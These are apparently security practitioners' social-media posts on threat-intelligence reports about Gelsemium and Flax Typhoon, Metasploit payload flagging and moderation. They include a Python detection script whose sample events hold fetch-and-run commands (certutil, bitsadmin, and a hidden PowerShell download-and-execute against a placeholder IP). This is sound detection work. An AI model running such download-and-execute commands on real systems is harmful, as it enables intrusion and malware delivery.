I have had several people who received the ban hammer recently grousing about how it goes against my air of “kindness” and the quote I have in my profile. I firmly believe in the importance of being kind to other people. But there are limits.
@jerry these actions are certainly kind to everyone else on the server; ban early, ban often (the old #metasploit IRC channel motto, due to it being a troll magnet).
The Palo Alto Networks Unit 42 research team discovered some activity that they attributed to a very stealthy and rarely seen APT, #Gelsemium. They target a diverse group of industries but use tools like #CobaltStrike, #MetaSploit, and #ChinaChopper but also used the Potato Suite that was seen as JuicyPotato.exe (who can't appreciate that?!). This was a great weekend read and I hope you all enjoy it as much as I did! Happy Hunting!
Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and the Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but also provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!
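As an added example (not from the post above or from the Microsoft report), here is a small triage script that runs a few LOLBIN-download detection rules over constructed process-creation events of the kind the post describes; the event format, hostnames and documentation-range IPs are all assumptions.

```python
import re

# Constructed sample process-creation events; hostnames and the
# 198.51.100.7 address are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/s.txt C:\Users\Public\s.txt"},
    {"host": "ws02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 http://198.51.100.7/t.exe C:\ProgramData\t.exe"},
    {"host": "ws03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"host": "ws04", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\corp.cer"},  # legitimate admin use, must not fire
    {"host": "ws05", "image": r"C:\Program Files\Backup\backup.exe",
     "cmdline": "backup.exe --schedule nightly"},
]

URL = r"https?://"

# (rule name, image pattern, command-line pattern). A hit requires both the
# binary and a download-style command line with a URL, so a plain certutil
# certificate check does not fire.
RULES = [
    ("lolbin_certutil_download", r"\\certutil\.exe$", r"-urlcache\b.*" + URL),
    ("lolbin_bitsadmin_download", r"\\bitsadmin\.exe$", r"/transfer\b.*" + URL),
    ("lolbin_powershell_download", r"\\powershell\.exe$",
     r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b.*" + URL),
]


def triage(events):
    """Return (host, rule name) pairs for events that match a download rule."""
    hits = []
    for ev in events:
        for name, image_re, cmd_re in RULES:
            if re.search(image_re, ev["image"], re.I) and re.search(cmd_re, ev["cmdline"], re.I):
                hits.append((ev["host"], name))
                break  # one matching rule per event is enough for triage
    return hits


if __name__ == "__main__":
    for host, rule in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

In a real hunt these patterns would be one input among several (parent process, user context, destination reputation), since each of these binaries also has legitimate uses.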
Granted, the metasploit-payloads gem has far more exotic payloads which might trigger code scanners, but payloads are useless without an exploit. Absolutely no reason why payloads should be flagged as malicious. #metasploit #rubygems